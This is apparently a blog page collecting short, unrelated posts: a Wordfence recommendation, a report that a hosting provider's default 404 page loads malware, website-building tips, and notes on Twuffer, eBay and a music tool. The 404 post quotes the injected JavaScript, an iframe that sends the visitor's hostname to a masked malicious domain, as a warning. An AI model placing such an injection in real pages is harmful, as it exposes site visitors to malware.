The Very Best: Wordfence

We run about 40+ websites with WordPress, not including clients and security is always at the forefront of our concerns. We would like to take this opportunity to share with you the absolute best plugin for WordPress: Wordfence.

We have tried and tested so many security plugins, some of which are great at what they do: AntiVirusSucuriScannerTheme Authenticity Checker and much more – however no plugin goes as deeply and thoroughly as WordFence.

Tech Support and the Infinite Typing Monkey Theorem

“Hey Harry, I think this one has got something – To be or not to be, that is the gazorninplat.” – An Infinite Number of Monkeys, Bob Newhart

If you love classic humor, you’ve probably heard this routine by Bob Newhart who imagined the daily routine of human supervisors in charge of an infinite number of monkeys, who according to the celebrated theorem, if given enough time would write all the greats literary works of all time.

Unfortunately, these typing monkeys seem to have found new jobs, mostly with technical support teams at some of America’s top Web Providers. We deal with a number of hosting services and had a bit of a problem of late: a default 404 page that distributes malware.

Our provider, which we shall not name at this point, has many servers one of which hosts over 90K websites. Within this server, is a directory no client can access, it is the /error/ directory, and it is here that a custom 404 page with an iframe that calls up a page from the infamous SearchMagnified site.

document.write('<iframe style="width: 100%; height:
100%; border: 0;" src="http://******.com/?dn='
+ location.hostname + '&pid=******"></iframe>');

So You Want To Build A Website?

Seriously, forget about it. No really, don’t even bother. As today’s web evolves, you’re better off creating your own one or two page site with a blogging platform with links to relevant social media where you’ll do most of your work anyway. Most important of all, provide useful and basic information that can be easily accessed with a mobile device !

  • Be to the point. Nobody cares about splash screens, flash intros, portfolios or any other useless drivel beyond the basics : Who, What, When, Where, How and WHY!
  • People perform searches on the go. They now spend more time searching with a mobile device than on destop computers.
  • People want to know WHERE you are. If you’re not on Google Maps, you don’t really exist.
  • People want to know WHAT you do. Be social. Facebook for instance is the best way to get people to know you and trust your services.
  • Get involved with niche web 2.0 services relevant to your industry.
  • Forget twitter. It’s basically for politicians, celebrities and news.

Twuffer – it’s a twitter buffer!

We recently discovered an amazing service that finally delivers what it promises: to be able to manage and post future tweets. If you run a blog, you probably would like to promote your postings evenly over time instead of the classic burst of links most users are accustomed to.

As well, if you have a major event coming up, do you have the time to promote in on twitter, or would having tweets arranged by date and time be a time saver? Welcome to Twuffer, a twitter scheduler with impeccable functionality, ease of use and – best of all – no link jacking. You know what I mean, don’t you?

eBay Is No Longer eBay

For years, we’ve listed and sold stuff on eBay (not an affiliate links for sure …). Ever since the mid to late 90s in fact. We stopped selling for a while, and almost forgot about the service until we realized we had quite a bit of good quality equipment we wanted to offload. We went back to eBay … We were shocked. Things have drastically changed and not for the better, why this is we decided to investigate.

Music Composition For Nerds is an amazing little site with a nifty musical tool. Anyone using the web based application can create music loops by following a few rules. The first step is to select 1 of 8 different Sound Patterns from the small Matrixes icons on the right. You then use your mouse to draw notes on each 16 Step Matrix and you adjust the volume of the iNudge application. For each pattern, you can adjust the volume, you can mute, clear, or set the audio pan from Left to Right.

You can also click on the tempo numbers and click up or down to change the overall tempo. To make the nudge longer use the “plus” button. You can use the Clear, Copy, Cut and Paste functions to edit your pattern faster. Get & Share allows you to send mail, get links, get embed code or spread your latest creation in social media communities. Using the Feedback Forum, you can tell us what you think, leave your comments or make suggestions.
